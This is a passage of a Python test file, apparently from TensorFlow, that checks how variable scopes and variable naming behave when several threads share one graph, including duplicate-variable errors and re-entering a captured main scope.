@run_inside_wrap_function_in_eager_mode
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
            # Any thread after the first one should fail to create a variable
            # with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
            # Any thread after the first one should fail to create a variable
            # with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()


if __name__ == "__main__":
test.main()